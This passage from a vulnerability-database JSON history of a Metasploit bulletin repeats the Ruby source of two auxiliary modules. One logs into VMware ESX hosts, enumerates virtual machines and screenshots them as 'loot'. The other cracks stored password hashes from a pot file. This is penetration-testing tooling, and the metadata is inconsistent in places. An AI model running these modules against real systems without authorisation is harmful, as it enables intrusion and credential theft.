Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-23T20:26:07", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "6c84c71c26c06a00213c1b7d4a417512", "type": "metasploit", "bulletinFamily": "exploit", "title": "Apply Pot File To Hashes", "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password hashes in the creds database instantly. JtR's --show functionality is used to help combine all the passwords into an easy to use format.\n", "published": "2019-02-03T15:17:25", "modified": "2019-04-05T00:50:52", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T03:24:46", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-11-21T03:24:46"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:3936"]}, {"type": "kitploit", "idList": ["KITPLOIT:4300516647684705208"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:8FA9C4EA4CE4A486771CF1A29E25831A", "CARBONBLACK:149D12C58167946852465E001862945F", "CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1997.NASL", "CISCO-SA-20180328-FWIP.NASL", "DEBIAN_DLA-1995.NASL", "REDHAT-RHSA-2019-3898.NASL", "UBUNTU_USN-4195-1.NASL", "ITUNES_12_10_2.NASL", "XEN_SERVER_XSA-299.NASL", "FEDORA_2019-F454C7A118.NASL", "DEBIAN_DSA-4574.NASL", "OPENSUSE-2019-2530.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704573", "OPENVAS:1361412562310143152", "OPENVAS:1361412562310143154"]}], "modified": "2019-11-21T03:24:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/apply_pot.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n\n def initialize\n super(\n 'Name' => 'Apply Pot File To Hashes',\n 'Description' => %Q{\n This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.\n },\n 'Author' => ['h00die'],\n 'License' => MSF_LICENSE\n )\n deregister_options('ITERATION_TIMEOUT')\n deregister_options('CUSTOM_WORDLIST')\n deregister_options('KORELOGIC')\n deregister_options('MUTATE')\n deregister_options('USE_CREDS')\n deregister_options('USE_DB_INFO')\n deregister_options('USE_DEFAULT_WORDLIST')\n deregister_options('USE_ROOT_WORDS')\n deregister_options('USE_HOSTNAMES')\n\n end\n\n # Not all hash formats include an 'id' field, which coresponds which db entry\n # an item is to its hash. This can be problematic, especially when a username\n # is used as a salt. Due to all the variations, we make a small HashLookup\n # class to handle all the fields for easier lookup later.\n class HashLookup\n attr_accessor :db_hash\n attr_accessor :jtr_hash\n attr_accessor :username\n attr_accessor :id\n\n def initialize(db_hash, jtr_hash, username, id)\n @db_hash = db_hash\n @jtr_hash = jtr_hash\n @username = username\n @id = id\n end\n end\n\n def run\n cracker = new_john_cracker\n\n lookups = []\n\n # create one massive hash file with all the hashes\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n framework.db.creds(workspace: myworkspace).each do |core|\n next if core.private.type == 'Metasploit::Credential::Password'\n jtr_hash = hash_to_jtr(core)\n hashlist.puts jtr_hash\n lookups << HashLookup.new(core.private.data, jtr_hash, core.public, core.id)\n end\n hashlist.close\n cracker.hash_path = hashlist.path\n print_status \"Hashes Written out to #{hashlist.path}\"\n cleanup_files = [cracker.hash_path]\n\n # cycle through all hash types we dump asking jtr to show us\n # cracked passwords. The advantage to this vs just comparing\n # john.pot to the hashes directly is we use jtr to recombine\n # lanman, and other assorted nuances\n ['bcrypt', 'bsdicrypt', 'crypt', 'descrypt', 'lm', 'nt',\n 'md5crypt', 'mysql', 'mysql-sha1', 'mssql', 'mssql05', 'mssql12',\n 'oracle', 'oracle11', 'oracle12c', 'dynamic_1506', #oracles\n 'dynamic_1034' #postgres\n ].each do |format|\n\n print_status(\"Checking #{format} hashes against pot file\")\n cracker.format = format\n cracker.each_cracked_password do |password_line|\n password_line.chomp!\n next if password_line.blank? || password_line.nil?\n fields = password_line.split(\":\")\n core_id = nil\n case format\n when 'descrypt'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n when 'md5crypt', 'descrypt', 'bsdicrypt', 'crypt', 'bcrypt'\n next unless fields.count >=7\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop }\n when 'mssql', 'mssql05', 'mssql12', 'mysql', 'mysql-sha1',\n 'oracle', 'dynamic_1506', 'oracle11', 'oracle12c'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1506' #oracle H code\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1034' #postgres\n next unless fields.count >=2\n username = fields.shift\n password = fields.join(':')\n # unfortunately to match up all the fields we need to pull the hash\n # field as well, and it is only available in the pot file.\n pot = cracker.pot || cracker.john_pot_file\n\n File.open(pot, 'rb').each do |line|\n if line.start_with?('$dynamic_1034$') #postgres format\n lookups.each do |l|\n pot_hash = line.split(\":\")[0]\n raw_pot_hash = pot_hash.split('$')[2]\n if l.username.to_s == username &&\n l.jtr_hash == \"#{username}:$dynamic_1034$#{raw_pot_hash}\" &&\n l.db_hash == raw_pot_hash\n core_id = l.id\n break\n end\n end\n end\n end\n when 'lm', 'nt'\n next unless fields.count >=7\n username = fields.shift\n core_id = fields.pop\n 2.times{ fields.pop }\n # get the NT and LM hashes\n nt_hash = fields.pop\n lm_hash = fields.pop\n core_id = fields.pop\n password = fields.join(':')\n if format == 'lm'\n if password.blank?\n if nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH\n password = ''\n else\n next\n end\n end\n password = john_lm_upper_to_ntlm(password, nt_hash)\n next if password.nil?\n end\n fields = password.split(':') #for consistency on the following join out of the case\n end\n unless core_id.nil?\n password = fields.join(':')\n print_good \"#{username}:#{password}\"\n create_cracked_credential( username: username, password: password, core_id: core_id)\n end\n end\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T03:24:46", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T08:43:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-11-21T08:43:32"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:3936"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4855"]}, {"type": "kitploit", "idList": ["KITPLOIT:4300516647684705208"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:8FA9C4EA4CE4A486771CF1A29E25831A", "CARBONBLACK:149D12C58167946852465E001862945F", "CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-FWIP.NASL", "DEBIAN_DLA-1995.NASL", "FEDORA_2019-F454C7A118.NASL", "DEBIAN_DSA-4574.NASL", "XEN_SERVER_XSA-299.NASL", "ITUNES_12_10_2.NASL", "OPENSUSE-2019-2530.NASL", "OPENSUSE-2019-2529.NASL", "REDHAT-RHSA-2019-3898.NASL", "UBUNTU_USN-4195-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704574", "OPENVAS:1361412562310143152", "OPENVAS:1361412562310143154"]}], "modified": "2019-11-21T08:43:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T08:43:32", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-30T09:01:43", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-11-30T09:01:43"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:71A4C483AA829E832B593968172BABD3"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512489"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:964A2741314DED7D3C9108B2C0610727"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-IKE-DOS-IOS.NASL", "CISCO-SA-20180328-SMI-IOS.NASL", "CISCO-SA-20180328-SMI-IOSXE.NASL", "CISCO-SA-20180328-SNMP.NASL", "FREEBSD_PKG_6ADE62D90F6211EA96734C72B94353B5.NASL", "PHPMYADMIN_PMASA_2019_5.NASL", "SUSE_SU-2019-3046-1.NASL", "SUSE_SU-2019-3064-1.NASL", "DEBIAN_DLA-2006.NASL", "FREEBSD_PKG_EDC0BF7E05A111EA9DFAF8B156AC3FF9.NASL"]}, {"type": "kitploit", "idList": ["KITPLOIT:8450822357645896013", "KITPLOIT:5187651885441680523"]}, {"type": "pentestit", "idList": ["PENTESTIT:01C7B487A5D5BB76DF2F3A190AFE4789"]}, {"type": "xen", "idList": ["XSA-306"]}, {"type": "cve", "idList": ["CVE-2011-4350"]}], "modified": "2019-11-30T09:01:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-30T09:01:43", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-30T12:09:01", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-11-30T12:09:01"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:71A4C483AA829E832B593968172BABD3"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512489"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:964A2741314DED7D3C9108B2C0610727"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-SMI-IOS.NASL", "CISCO-SA-20180328-IKE-DOS-IOS.NASL", "CISCO-SA-20180328-SMI-IOSXE.NASL", "CISCO-SA-20180328-SNMP.NASL", "FREEBSD_PKG_6ADE62D90F6211EA96734C72B94353B5.NASL", "PHPMYADMIN_PMASA_2019_5.NASL", "SUSE_SU-2019-3046-1.NASL", "SUSE_SU-2019-3064-1.NASL", "DEBIAN_DLA-2006.NASL", "FREEBSD_PKG_EDC0BF7E05A111EA9DFAF8B156AC3FF9.NASL"]}, {"type": "kitploit", "idList": ["KITPLOIT:8450822357645896013", "KITPLOIT:5187651885441680523"]}, {"type": "pentestit", "idList": ["PENTESTIT:01C7B487A5D5BB76DF2F3A190AFE4789"]}, {"type": "xen", "idList": ["XSA-306"]}, {"type": "cve", "idList": ["CVE-2011-4350"]}], "modified": "2019-11-30T12:09:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-30T12:09:01", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-12-16T18:59:33", "history": [], "viewCount": 9, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2019-12-16T18:59:33"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4532920", "KB4530719"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143253", "OPENVAS:1361412562310143251", "OPENVAS:1361412562310143252", "OPENVAS:1361412562310143254", "OPENVAS:1361412562310892035", "OPENVAS:1361412562310704584", "OPENVAS:1361412562310892033", "OPENVAS:1361412562310892034", "OPENVAS:1361412562310704582", "OPENVAS:1361412562310704583"]}, {"type": "kitploit", "idList": ["KITPLOIT:5508508615609885168", "KITPLOIT:4145068200266092374"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4565-2:D5727"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:0E840ABBD8CEC50B36ABC76E37C6AB3D", "CARBONBLACK:1C0BC444BB6DEFFCF2000BBC5A56B173", "CARBONBLACK:02287EF3698A94E9144481589D424ACE", "CARBONBLACK:40FD43E47647314E6D1BF83C1FA1B333"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66"]}], "modified": "2019-12-16T18:59:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-12-16T18:59:33", "differentElements": ["modified", "published"], "edition": 53}], "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2019-12-16T23:06:30"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4532920", "KB4530719"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143251", "OPENVAS:1361412562310143253", "OPENVAS:1361412562310143252", "OPENVAS:1361412562310143254", "OPENVAS:1361412562310892035", "OPENVAS:1361412562310892034", "OPENVAS:1361412562310704584", "OPENVAS:1361412562310892033", "OPENVAS:1361412562310704582", "OPENVAS:1361412562310704583"]}, {"type": "kitploit", "idList": ["KITPLOIT:5508508615609885168", "KITPLOIT:4145068200266092374"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4565-2:D5727"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:0E840ABBD8CEC50B36ABC76E37C6AB3D", "CARBONBLACK:1C0BC444BB6DEFFCF2000BBC5A56B173", "CARBONBLACK:02287EF3698A94E9144481589D424ACE", "CARBONBLACK:40FD43E47647314E6D1BF83C1FA1B333"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66"]}], "modified": "2019-12-16T23:06:30"}, "vulnersScore": -0.0}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include 